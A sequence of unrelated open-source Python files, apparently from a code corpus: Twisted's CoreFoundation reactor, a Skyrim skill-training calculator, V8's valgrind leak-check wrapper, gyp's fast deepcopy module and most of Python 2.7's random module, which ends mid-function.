kCFSocketAutomaticallyReenableReadCallBack,
kCFSocketAutomaticallyReenableWriteCallBack)
_READ = 0
_WRITE = 1
_preserveSOError = 1 << 6
class _WakerPlus(_Waker):
"""
The normal Twisted waker will simply wake up the main loop, which causes an
iteration to run, which in turn causes L{PosixReactorBase.runUntilCurrent}
to get invoked.
L{CFReactor} has a slightly different model of iteration, though: rather
than have each iteration process the thread queue, then timed calls, then
file descriptors, each callback is run as it is dispatched by the CFRunLoop
observer which triggered it.
So this waker needs to not only unblock the loop, but also make sure the
work gets done; so, it reschedules the invocation of C{runUntilCurrent} to
be immediate (0 seconds from now) even if there is no timed call work to
do.
"""
def doRead(self):
"""
Wake up the loop and force C{runUntilCurrent} to run immediately in the
next timed iteration.
"""
result = _Waker.doRead(self)
self.reactor._scheduleSimulate(True)
return result
class CFReactor(PosixReactorBase):
"""
The CoreFoundation reactor.
You probably want to use this via the L{install} API.
@ivar _fdmap: a dictionary, mapping an integer (a file descriptor) to a
4-tuple of:
- source: a C{CFRunLoopSource}; the source associated with this
socket.
- socket: a C{CFSocket} wrapping the file descriptor.
- descriptor: an L{IReadDescriptor} and/or L{IWriteDescriptor}
provider.
- read-write: a 2-C{list} of booleans: respectively, whether this
descriptor is currently registered for reading or registered for
writing.
@ivar _idmap: a dictionary, mapping the id() of an L{IReadDescriptor} or
L{IWriteDescriptor} to a C{fd} in L{_fdmap}. Implemented in this
manner so that we don't have to rely (even more) on the hashability of
L{IReadDescriptor} providers, and we know that they won't be collected
since these are kept in sync with C{_fdmap}. Necessary because the
.fileno() of a file descriptor may change at will, so we need to be
able to look up what its file descriptor I{used} to be, so that we can
look it up in C{_fdmap}
@ivar _cfrunloop: the L{CFRunLoop} pyobjc object wrapped by this reactor.
@ivar _inCFLoop: Is L{CFRunLoopRun} currently running?
@type _inCFLoop: C{bool}
@ivar _currentSimulator: if a CFTimer is currently scheduled with the CF
run loop to run Twisted callLater calls, this is a reference to it.
Otherwise, it is C{None}
"""
implements(IReactorFDSet)
def __init__(self, runLoop=None, runner=None):
self._fdmap = {}
self._idmap = {}
if runner is None:
runner = CFRunLoopRun
self._runner = runner
if runLoop is None:
runLoop = CFRunLoopGetMain()
self._cfrunloop = runLoop
PosixReactorBase.__init__(self)
def installWaker(self):
"""
Override C{installWaker} in order to use L{_WakerPlus}; otherwise this
should be exactly the same as the parent implementation.
"""
if not self.waker:
self.waker = _WakerPlus(self)
self._internalReaders.add(self.waker)
self.addReader(self.waker)
def _socketCallback(self, cfSocket, callbackType,
ignoredAddress, ignoredData, context):
"""
The socket callback issued by CFRunLoop. This will issue C{doRead} or
C{doWrite} calls to the L{IReadDescriptor} and L{IWriteDescriptor}
registered with the file descriptor that we are being notified of.
@param cfSocket: The L{CFSocket} which has got some activity.
@param callbackType: The type of activity that we are being notified
of. Either L{kCFSocketReadCallBack} or L{kCFSocketWriteCallBack}.
@param ignoredAddress: Unused, because this is not used for either of
the callback types we register for.
@param ignoredData: Unused, because this is not used for either of the
callback types we register for.
@param context: The data associated with this callback by
L{CFSocketCreateWithNative} (in L{CFReactor._watchFD}). A 2-tuple
of C{(int, CFRunLoopSource)}.
"""
(fd, smugglesrc) = context
if fd not in self._fdmap:
# Spurious notifications seem to be generated sometimes if you
# CFSocketDisableCallBacks in the middle of an event. I don't know
# about this FD, any more, so let's get rid of it.
CFRunLoopRemoveSource(
self._cfrunloop, smugglesrc, kCFRunLoopCommonModes
)
return
try:
src, skt, readWriteDescriptor, rw = self._fdmap[fd]
why = None
isRead = callbackType == kCFSocketReadCallBack
try:
# CFSocket seems to deliver duplicate read/write notifications
# sometimes, especially a duplicate writability notification
# when first registering the socket. This bears further
# investigation, since I may have been mis-interpreting the
# behavior I was seeing. (Running the full Twisted test suite,
# while thorough, is not always entirely clear.) Until this has
# been more thoroughly investigated , we consult our own
# reading/writing state flags to determine whether we should
# actually attempt a doRead/doWrite first. -glyph
if isRead:
if rw[_READ]:
why = readWriteDescriptor.doRead()
else:
if rw[_WRITE]:
why = readWriteDescriptor.doWrite()
except:
why = sys.exc_info()[1]
log.err()
handfn = getattr(readWriteDescriptor, 'fileno', None)
if handfn is None:
why = _NO_FILENO
elif handfn() == -1:
why = _NO_FILEDESC
if why:
self._disconnectSelectable(readWriteDescriptor, why, isRead)
except:
log.err()
def _watchFD(self, fd, descr, flag):
"""
Register a file descriptor with the L{CFRunLoop}, or modify its state
so that it's listening for both notifications (read and write) rather
than just one; used to implement C{addReader} and C{addWriter}.
@param fd: The file descriptor.
@type fd: C{int}
@param descr: the L{IReadDescriptor} or L{IWriteDescriptor}
@param flag: the flag to register for callbacks on, either
L{kCFSocketReadCallBack} or L{kCFSocketWriteCallBack}
"""
if fd == -1:
raise RuntimeError("Invalid file descriptor.")
if fd in self._fdmap:
src, cfs, gotdescr, rw = self._fdmap[fd]
# do I need to verify that it's the same descr?
else:
ctx = []
ctx.append(fd)
cfs = CFSocketCreateWithNative(
kCFAllocatorDefault, fd,
kCFSocketReadCallBack | kCFSocketWriteCallBack |
kCFSocketConnectCallBack,
self._socketCallback, ctx
)
CFSocketSetSocketFlags(
cfs,
kCFSocketAutomaticallyReenableReadCallBack |
kCFSocketAutomaticallyReenableWriteCallBack |
# This extra flag is to ensure that CF doesn't (destructively,
# because destructively is the only way to do it) retrieve
# SO_ERROR and thereby break twisted.internet.tcp.BaseClient,
# which needs SO_ERROR to tell it whether or not it needs to
# call connect_ex a second time.
_preserveSOError
)
src = CFSocketCreateRunLoopSource(kCFAllocatorDefault, cfs, 0)
ctx.append(src)
CFRunLoopAddSource(self._cfrunloop, src, kCFRunLoopCommonModes)
CFSocketDisableCallBacks(
cfs,
kCFSocketReadCallBack | kCFSocketWriteCallBack |
kCFSocketConnectCallBack
)
rw = [False, False]
self._idmap[id(descr)] = fd
self._fdmap[fd] = src, cfs, descr, rw
rw[self._flag2idx(flag)] = True
CFSocketEnableCallBacks(cfs, flag)
def _flag2idx(self, flag):
"""
Convert a C{kCFSocket...} constant to an index into the read/write
state list (C{_READ} or C{_WRITE}) (the 4th element of the value of
C{self._fdmap}).
@param flag: C{kCFSocketReadCallBack} or C{kCFSocketWriteCallBack}
@return: C{_READ} or C{_WRITE}
"""
return {kCFSocketReadCallBack: _READ,
kCFSocketWriteCallBack: _WRITE}[flag]
def _unwatchFD(self, fd, descr, flag):
"""
Unregister a file descriptor with the L{CFRunLoop}, or modify its state
so that it's listening for only one notification (read or write) as
opposed to both; used to implement C{removeReader} and C{removeWriter}.
@param fd: a file descriptor
@type fd: C{int}
@param descr: an L{IReadDescriptor} or L{IWriteDescriptor}
@param flag: L{kCFSocketWriteCallBack} L{kCFSocketReadCallBack}
"""
if id(descr) not in self._idmap:
return
if fd == -1:
# need to deal with it in this case, I think.
realfd = self._idmap[id(descr)]
else:
realfd = fd
src, cfs, descr, rw = self._fdmap[realfd]
CFSocketDisableCallBacks(cfs, flag)
rw[self._flag2idx(flag)] = False
if not rw[_READ] and not rw[_WRITE]:
del self._idmap[id(descr)]
del self._fdmap[realfd]
CFRunLoopRemoveSource(self._cfrunloop, src, kCFRunLoopCommonModes)
CFSocketInvalidate(cfs)
def addReader(self, reader):
"""
Implement L{IReactorFDSet.addReader}.
"""
self._watchFD(reader.fileno(), reader, kCFSocketReadCallBack)
def addWriter(self, writer):
"""
Implement L{IReactorFDSet.addWriter}.
"""
self._watchFD(writer.fileno(), writer, kCFSocketWriteCallBack)
def removeReader(self, reader):
"""
Implement L{IReactorFDSet.removeReader}.
"""
self._unwatchFD(reader.fileno(), reader, kCFSocketReadCallBack)
def removeWriter(self, writer):
"""
Implement L{IReactorFDSet.removeWriter}.
"""
self._unwatchFD(writer.fileno(), writer, kCFSocketWriteCallBack)
def removeAll(self):
"""
Implement L{IReactorFDSet.removeAll}.
"""
allDesc = set([descr for src, cfs, descr, rw in self._fdmap.values()])
allDesc -= set(self._internalReaders)
for desc in allDesc:
self.removeReader(desc)
self.removeWriter(desc)
return list(allDesc)
def getReaders(self):
"""
Implement L{IReactorFDSet.getReaders}.
"""
return [descr for src, cfs, descr, rw in self._fdmap.values()
if rw[_READ]]
def getWriters(self):
"""
Implement L{IReactorFDSet.getWriters}.
"""
return [descr for src, cfs, descr, rw in self._fdmap.values()
if rw[_WRITE]]
def _moveCallLaterSooner(self, tple):
"""
Override L{PosixReactorBase}'s implementation of L{IDelayedCall.reset}
so that it will immediately reschedule. Normally
C{_moveCallLaterSooner} depends on the fact that C{runUntilCurrent} is
always run before the mainloop goes back to sleep, so this forces it to
immediately recompute how long the loop needs to stay asleep.
"""
result = PosixReactorBase._moveCallLaterSooner(self, tple)
self._scheduleSimulate()
return result
_inCFLoop = False
def mainLoop(self):
"""
Run the runner (L{CFRunLoopRun} or something that calls it), which runs
the run loop until C{crash()} is called.
"""
self._inCFLoop = True
try:
self._runner()
finally:
self._inCFLoop = False
_currentSimulator = None
def _scheduleSimulate(self, force=False):
"""
Schedule a call to C{self.runUntilCurrent}. This will cancel the
currently scheduled call if it is already scheduled.
@param force: Even if there are no timed calls, make sure that
C{runUntilCurrent} runs immediately (in a 0-seconds-from-now
{CFRunLoopTimer}). This is necessary for calls which need to
trigger behavior of C{runUntilCurrent} other than running timed
calls, such as draining the thread call queue or calling C{crash()}
when the appropriate flags are set.
@type force: C{bool}
"""
if self._currentSimulator is not None:
CFRunLoopTimerInvalidate(self._currentSimulator)
self._currentSimulator = None
timeout = self.timeout()
if force:
timeout = 0.0
if timeout is not None:
fireDate = (CFAbsoluteTimeGetCurrent() + timeout)
def simulate(cftimer, extra):
self._currentSimulator = None
self.runUntilCurrent()
self._scheduleSimulate()
c = self._currentSimulator = CFRunLoopTimerCreate(
kCFAllocatorDefault, fireDate,
0, 0, 0, simulate, None
)
CFRunLoopAddTimer(self._cfrunloop, c, kCFRunLoopCommonModes)
def callLater(self, _seconds, _f, *args, **kw):
"""
Implement L{IReactorTime.callLater}.
"""
delayedCall = PosixReactorBase.callLater(
self, _seconds, _f, *args, **kw
)
self._scheduleSimulate()
return delayedCall
def stop(self):
"""
Implement L{IReactorCore.stop}.
"""
PosixReactorBase.stop(self)
self._scheduleSimulate(True)
def crash(self):
"""
Implement L{IReactorCore.crash}
"""
wasStarted = self._started
PosixReactorBase.crash(self)
if self._inCFLoop:
self._stopNow()
else:
if wasStarted:
self.callLater(0, self._stopNow)
def _stopNow(self):
"""
Immediately stop the CFRunLoop (which must be running!).
"""
CFRunLoopStop(self._cfrunloop)
def iterate(self, delay=0):
"""
Emulate the behavior of C{iterate()} for things that want to call it,
by letting the loop run for a little while and then scheduling a timed
call to exit it.
"""
self.callLater(delay, self._stopNow)
self.mainLoop()
def install(runLoop=None, runner=None):
"""
Configure the twisted mainloop to be run inside CFRunLoop.
@param runLoop: the run loop to use.
@param runner: the function to call in order to actually invoke the main
loop. This will default to L{CFRunLoopRun} if not specified. However,
this is not an appropriate choice for GUI applications, as you need to
run NSApplicationMain (or something like it). For example, to run the
Twisted mainloop in a PyObjC application, your C{main.py} should look
something like this::
from PyObjCTools import AppHelper
from twisted.internet.cfreactor import install
install(runner=AppHelper.runEventLoop)
# initialize your application
reactor.run()
@return: The installed reactor.
@rtype: L{CFReactor}
"""
reactor = CFReactor(runLoop=runLoop, runner=runner)
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
| apache-2.0 |
Mailea/detailed-skyrim-calculator | skycalc/calculator.py | 2 | 4763 | """Calculate optimal training strategies to reach a certain character level.
3 Versions: fast, easy and balanced.
"""
def simulate_training(original_skill_levels, current, goal, selected_from):
"""Simulate skill training and return resulting information.
Attributes:
original_skill_levels: dict containing current levels of used skills.
current (int): current character level
goal (int): goal level
selected_from: selection method used for optimization
"""
def done(xp):
return xp <= 0
def make_result_dict(original_dict):
"""Return formatted skill data dictionary.
Attributes:
original_dict: dict containing current levels of used skills.
"""
def reformat(entry):
"""Reformat dictionary entry."""
return {"Start Level": original_dict[entry],
"Times Leveled": 0,
"Times Legendary": 0,
"Final Level": original_dict[entry]}
return {entry: reformat(entry) for entry in original_dict}
def total_xp(current_lvl, goal_lvl):
"""Return xp needed to advance from a current level to a goal level.
Attributes:
current_lvl (int): current character level
goal_lvl (int): goal level
"""
def level_up_xp(level):
"""Return xp needed for next level-up at a given level."""
return (level + 3) * 25
return sum(level_up_xp(lvl) for lvl in range(current_lvl, goal_lvl))
# TODO: get rid of side effects
def train(data, skill):
"""Update data as if a skill was trained."""
def trained(skill_level):
"""Return level reached by training a skill with a given level."""
if skill_level == 100: # 'make legendary'
return 16
else:
return skill_level + 1
data[skill]["Final Level"] = trained(data[skill]["Final Level"])
data[skill]["Times Leveled"] += 1
# TODO: make 'prettier'
needed_xp = total_xp(current, goal)
skill_data = make_result_dict(original_skill_levels)
while not done(needed_xp):
selected_skill = selected_from(skill_data)
train(skill_data, selected_skill)
needed_xp -= skill_data[selected_skill]["Final Level"]
return skill_data
def simulate_balanced_training(original_skill_levels,
current_level, goal_level):
"""Return skill training data for a balanced training method.
All skills are trained equally.
Attributes:
original_skill_levels: dict containing current levels of used skills.
current_level (int): current character level
goal_level (int): goal level
"""
def least_leveled(skill_dict):
"""Return the skill that was trained least."""
stripped_dict = {s: skill_dict[s]["Times Leveled"] for s in skill_dict}
return min(stripped_dict, key=stripped_dict.get)
return simulate_training(original_skill_levels,
current_level, goal_level,
least_leveled)
def simulate_easy_training(original_skill_levels, current_level, goal_level):
"""Return skill training data for the easiest possible training.
Always level the skill easiest to train.
Attributes:
original_skill_levels: dict containing current levels of used skills.
current_level (int): current character level
goal_level (int): goal level
"""
def lowest(skill_dict):
"""Return the skill with the lowest final level."""
stripped_dict = {s: skill_dict[s]["Final Level"] for s in skill_dict}
return min(stripped_dict, key=stripped_dict.get)
return simulate_training(original_skill_levels,
current_level, goal_level,
lowest)
def simulate_fast_training(original_skill_levels, current_level, goal_level):
"""Return skill training data for the fastest possible training.
Always train the skill giving the most xp.
Attributes:
original_skill_levels: dict containing current levels of used skills.
current_level (int): current character level
goal_level (int): goal level
"""
def highest(skill_dict):
"""Return the skill with the highest final level."""
stripped_dict = {s: skill_dict[s]["Final Level"] for s in skill_dict}
return max(stripped_dict, key=stripped_dict.get)
return simulate_training(original_skill_levels,
current_level, goal_level,
highest)
if __name__ == "__main__":
print(__doc__, "Not meant to be used as main.")
| mit |
indashnet/InDashNet.Open.UN2000 | android/external/chromium_org/v8/tools/run-valgrind.py | 92 | 2874 | #!/usr/bin/env python
#
# Copyright 2009 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Simple wrapper for running valgrind and checking the output on
# stderr for memory leaks.
import subprocess
import sys
import re
VALGRIND_ARGUMENTS = [
'valgrind',
'--error-exitcode=1',
'--leak-check=full',
'--smc-check=all'
]
# Compute the command line.
command = VALGRIND_ARGUMENTS + sys.argv[1:]
# Run valgrind.
process = subprocess.Popen(command, stderr=subprocess.PIPE)
code = process.wait();
errors = process.stderr.readlines();
# If valgrind produced an error, we report that to the user.
if code != 0:
sys.stderr.writelines(errors)
sys.exit(code)
# Look through the leak details and make sure that we don't
# have any definitely, indirectly, and possibly lost bytes.
LEAK_RE = r"(?:definitely|indirectly|possibly) lost: "
LEAK_LINE_MATCHER = re.compile(LEAK_RE)
LEAK_OKAY_MATCHER = re.compile(r"lost: 0 bytes in 0 blocks")
leaks = []
for line in errors:
if LEAK_LINE_MATCHER.search(line):
leaks.append(line)
if not LEAK_OKAY_MATCHER.search(line):
sys.stderr.writelines(errors)
sys.exit(1)
# Make sure we found between 2 and 3 leak lines.
if len(leaks) < 2 or len(leaks) > 3:
sys.stderr.writelines(errors)
sys.stderr.write('\n\n#### Malformed valgrind output.\n#### Exiting.\n')
sys.exit(1)
# No leaks found.
sys.exit(0)
| apache-2.0 |
pombredanne/pangyp | gyp/pylib/gyp/simple_copy.py | 1869 | 1247 | # Copyright 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A clone of the default copy.deepcopy that doesn't handle cyclic
structures or complex types except for dicts and lists. This is
because gyp copies so large structure that small copy overhead ends up
taking seconds in a project the size of Chromium."""
class Error(Exception):
pass
__all__ = ["Error", "deepcopy"]
def deepcopy(x):
"""Deep copy operation on gyp objects such as strings, ints, dicts
and lists. More than twice as fast as copy.deepcopy but much less
generic."""
try:
return _deepcopy_dispatch[type(x)](x)
except KeyError:
raise Error('Unsupported type %s for deepcopy. Use copy.deepcopy ' +
'or expand simple_copy support.' % type(x))
_deepcopy_dispatch = d = {}
def _deepcopy_atomic(x):
return x
for x in (type(None), int, long, float,
bool, str, unicode, type):
d[x] = _deepcopy_atomic
def _deepcopy_list(x):
return [deepcopy(a) for a in x]
d[list] = _deepcopy_list
def _deepcopy_dict(x):
y = {}
for key, value in x.iteritems():
y[deepcopy(key)] = deepcopy(value)
return y
d[dict] = _deepcopy_dict
del d
| mit |
sdphome/UHF_Reader | rfs/rootfs/usr/lib/python2.7/random.py | 53 | 32323 | """Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
distributions on the circle (angles 0 to 2pi)
---------------------------------------------
circular uniform
von Mises
General notes on the underlying Mersenne Twister core generator:
* The period is 2**19937-1.
* It is one of the most extensively tested generators in existence.
* Without a direct way to compute N steps forward, the semantics of
jumpahead(n) are weakened to simply jump to another distant state and rely
on the large period to avoid overlapping sequences.
* The random() method is implemented in C, executes in a single Python step,
and is, therefore, threadsafe.
"""
from __future__ import division
from warnings import warn as _warn
from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType
from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil
from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin
from os import urandom as _urandom
from binascii import hexlify as _hexlify
import hashlib as _hashlib
__all__ = ["Random","seed","random","uniform","randint","choice","sample",
"randrange","shuffle","normalvariate","lognormvariate",
"expovariate","vonmisesvariate","gammavariate","triangular",
"gauss","betavariate","paretovariate","weibullvariate",
"getstate","setstate","jumpahead", "WichmannHill", "getrandbits",
"SystemRandom"]
NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)
BPF = 53 # Number of bits in a float
RECIP_BPF = 2**-BPF
# Translated by Guido van Rossum from C source provided by
# Adrian Baddeley. Adapted by Raymond Hettinger for use with
# the Mersenne Twister and os.urandom() core generators.
import _random
class Random(_random.Random):
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state. Especially useful for multi-threaded programs, creating
a different instance of Random for each thread, and using the jumpahead()
method to ensure that the generated sequences seen by each thread don't
overlap.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), setstate() and jumpahead().
Optionally, implement a getrandbits() method so that randrange() can cover
arbitrarily large ranges.
"""
VERSION = 3 # used by getstate/setstate
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self.seed(x)
self.gauss_next = None
def seed(self, a=None):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If a is not None or an int or long, hash(a) is used instead.
"""
if a is None:
try:
# Seed with enough bytes to span the 19937 bit
# state space for the Mersenne Twister
a = long(_hexlify(_urandom(2500)), 16)
except NotImplementedError:
import time
a = long(time.time() * 256) # use fractional seconds
super(Random, self).seed(a)
self.gauss_next = None
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, super(Random, self).getstate(), self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 3:
version, internalstate, self.gauss_next = state
super(Random, self).setstate(internalstate)
elif version == 2:
version, internalstate, self.gauss_next = state
# In version 2, the state was saved as signed ints, which causes
# inconsistencies between 32/64-bit systems. The state is
# really unsigned 32-bit ints, so we convert negative ints from
# version 2 to positive longs for version 3.
try:
internalstate = tuple( long(x) % (2**32) for x in internalstate )
except ValueError, e:
raise TypeError, e
super(Random, self).setstate(internalstate)
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
def jumpahead(self, n):
"""Change the internal state to one that is likely far away
from the current state. This method will not be in Py3.x,
so it is better to simply reseed.
"""
# The super.jumpahead() method uses shuffling to change state,
# so it needs a large and "interesting" n to work with. Here,
# we use hashing to create a large n for the shuffle.
s = repr(n) + repr(self.getstate())
n = int(_hashlib.new('sha512', s).hexdigest(), 16)
super(Random, self).jumpahead(n)
## ---- Methods below this point do not need to be overridden when
## ---- subclassing for the purpose of using a different core generator.
## -------------------- pickle support -------------------
def __getstate__(self): # for pickle
return self.getstate()
def __setstate__(self, state): # for pickle
self.setstate(state)
def __reduce__(self):
return self.__class__, (), self.getstate()
## -------------------- integer methods -------------------
def randrange(self, start, stop=None, step=1, _int=int, _maxwidth=1L<<BPF):
"""Choose a random item from range(start, stop[, step]).
This fixes the problem with randint() which includes the
endpoint; in Python this is usually not what you want.
"""
# This code is a bit messy to make it fast for the
# common case while still doing adequate error checking.
istart = _int(start)
if istart != start:
raise ValueError, "non-integer arg 1 for randrange()"
if stop is None:
if istart > 0:
if istart >= _maxwidth:
return self._randbelow(istart)
return _int(self.random() * istart)
raise ValueError, "empty range for randrange()"
# stop argument supplied.
istop = _int(stop)
if istop != stop:
raise ValueError, "non-integer stop for randrange()"
width = istop - istart
if step == 1 and width > 0:
# Note that
# int(istart + self.random()*width)
# instead would be incorrect. For example, consider istart
# = -2 and istop = 0. Then the guts would be in
# -2.0 to 0.0 exclusive on both ends (ignoring that random()
# might return 0.0), and because int() truncates toward 0, the
# final result would be -1 or 0 (instead of -2 or -1).
# istart + int(self.random()*width)
# would also be incorrect, for a subtler reason: the RHS
# can return a long, and then randrange() would also return
# a long, but we're supposed to return an int (for backward
# compatibility).
if width >= _maxwidth:
return _int(istart + self._randbelow(width))
return _int(istart + _int(self.random()*width))
if step == 1:
raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width)
# Non-unit step argument supplied.
istep = _int(step)
if istep != step:
raise ValueError, "non-integer step for randrange()"
if istep > 0:
n = (width + istep - 1) // istep
elif istep < 0:
n = (width + istep + 1) // istep
else:
raise ValueError, "zero step for randrange()"
if n <= 0:
raise ValueError, "empty range for randrange()"
if n >= _maxwidth:
return istart + istep*self._randbelow(n)
return istart + istep*_int(self.random() * n)
def randint(self, a, b):
"""Return random integer in range [a, b], including both end points.
"""
return self.randrange(a, b+1)
def _randbelow(self, n, _log=_log, _int=int, _maxwidth=1L<<BPF,
_Method=_MethodType, _BuiltinMethod=_BuiltinMethodType):
"""Return a random int in the range [0,n)
Handles the case where n has more bits than returned
by a single call to the underlying generator.
"""
try:
getrandbits = self.getrandbits
except AttributeError:
pass
else:
# Only call self.getrandbits if the original random() builtin method
# has not been overridden or if a new getrandbits() was supplied.
# This assures that the two methods correspond.
if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method:
k = _int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2)
r = getrandbits(k)
while r >= n:
r = getrandbits(k)
return r
if n >= _maxwidth:
_warn("Underlying random() generator does not supply \n"
"enough bits to choose from a population range this large")
return _int(self.random() * n)
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty
def shuffle(self, x, random=None):
"""x, random=random.random -> shuffle list x in place; return None.
Optional arg random is a 0-argument function returning a random
float in [0.0, 1.0); by default, the standard random.random.
"""
if random is None:
random = self.random
_int = int
for i in reversed(xrange(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = _int(random() * (i+1))
x[i], x[j] = x[j], x[i]
def sample(self, population, k):
"""Chooses k unique random elements from a population sequence.
Returns a new list containing elements from the population while
leaving the original population unchanged. The resulting list is
in selection order so that all sub-slices will also be valid random
samples. This allows raffle winners (the sample) to be partitioned
into grand prize and second place winners (the subslices).
Members of the population need not be hashable or unique. If the
population contains repeats, then each occurrence is a possible
selection in the sample.
To choose a sample in a range of integers, use xrange as an argument.
This is especially fast and space efficient for sampling from a
large population: sample(xrange(10000000), 60)
"""
# Sampling without replacement entails tracking either potential
# selections (the pool) in a list or previous selections in a set.
# When the number of selections is small compared to the
# population, then tracking selections is efficient, requiring
# only a small set and an occasional reselection. For
# a larger number of selections, the pool tracking method is
# preferred since the list takes less space than the
# set and it doesn't suffer from frequent reselections.
n = len(population)
if not 0 <= k <= n:
raise ValueError("sample larger than population")
random = self.random
_int = int
result = [None] * k
setsize = 21 # size of a small set minus size of an empty list
if k > 5:
setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
if n <= setsize or hasattr(population, "keys"):
# An n-length list is smaller than a k-length set, or this is a
# mapping type so the other algorithm wouldn't work.
pool = list(population)
for i in xrange(k): # invariant: non-selected at [0,n-i)
j = _int(random() * (n-i))
result[i] = pool[j]
pool[j] = pool[n-i-1] # move non-selected item into vacancy
else:
try:
selected = set()
selected_add = selected.add
for i in xrange(k):
j = _int(random() * n)
while j in selected:
j = _int(random() * n)
selected_add(j)
result[i] = population[j]
except (TypeError, KeyError): # handle (at least) sets
if isinstance(population, list):
raise
return self.sample(tuple(population), k)
return result
## -------------------- real-valued distributions -------------------
## -------------------- uniform distribution -------------------
def uniform(self, a, b):
"Get a random number in the range [a, b) or [a, b] depending on rounding."
return a + (b-a) * self.random()
## -------------------- triangular --------------------
def triangular(self, low=0.0, high=1.0, mode=None):
"""Triangular distribution.
Continuous distribution bounded by given lower and upper limits,
and having a given mode value in-between.
http://en.wikipedia.org/wiki/Triangular_distribution
"""
u = self.random()
try:
c = 0.5 if mode is None else (mode - low) / (high - low)
except ZeroDivisionError:
return low
if u > c:
u = 1.0 - u
c = 1.0 - c
low, high = high, low
return low + (high - low) * (u * c) ** 0.5
## -------------------- normal distribution --------------------
def normalvariate(self, mu, sigma):
"""Normal distribution.
mu is the mean, and sigma is the standard deviation.
"""
# mu = mean, sigma = standard deviation
# Uses Kinderman and Monahan method. Reference: Kinderman,
# A.J. and Monahan, J.F., "Computer generation of random
# variables using the ratio of uniform deviates", ACM Trans
# Math Software, 3, (1977), pp257-260.
random = self.random
while 1:
u1 = random()
u2 = 1.0 - random()
z = NV_MAGICCONST*(u1-0.5)/u2
zz = z*z/4.0
if zz <= -_log(u2):
break
return mu + z*sigma
## -------------------- lognormal distribution --------------------
def lognormvariate(self, mu, sigma):
"""Log normal distribution.
If you take the natural logarithm of this distribution, you'll get a
normal distribution with mean mu and standard deviation sigma.
mu can have any value, and sigma must be greater than zero.
"""
return _exp(self.normalvariate(mu, sigma))
## -------------------- exponential distribution --------------------
def expovariate(self, lambd):
"""Exponential distribution.
lambd is 1.0 divided by the desired mean. It should be
nonzero. (The parameter would be called "lambda", but that is
a reserved word in Python.) Returned values range from 0 to
positive infinity if lambd is positive, and from negative
infinity to 0 if lambd is negative.
"""
# lambd: rate lambd = 1/mean
# ('lambda' is a Python reserved word)
# we use 1-random() instead of random() to preclude the
# possibility of taking the log of zero.
return -_log(1.0 - self.random())/lambd
## -------------------- von Mises distribution --------------------
def vonmisesvariate(self, mu, kappa):
"""Circular data distribution.
mu is the mean angle, expressed in radians between 0 and 2*pi, and
kappa is the concentration parameter, which must be greater than or
equal to zero. If kappa is equal to zero, this distribution reduces
to a uniform random angle over the range 0 to 2*pi.
"""
# mu: mean angle (in radians between 0 and 2*pi)
# kappa: concentration parameter kappa (>= 0)
# if kappa = 0 generate uniform random angle
# Based upon an algorithm published in: Fisher, N.I.,
# "Statistical Analysis of Circular Data", Cambridge
# University Press, 1993.
# Thanks to Magnus Kessler for a correction to the
# implementation of step 4.
random = self.random
if kappa <= 1e-6:
return TWOPI * random()
s = 0.5 / kappa
r = s + _sqrt(1.0 + s * s)
while 1:
u1 = random()
z = _cos(_pi * u1)
d = z / (r + z)
u2 = random()
if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d):
break
q = 1.0 / r
f = (q + z) / (1.0 + q * z)
u3 = random()
if u3 > 0.5:
theta = (mu + _acos(f)) % TWOPI
else:
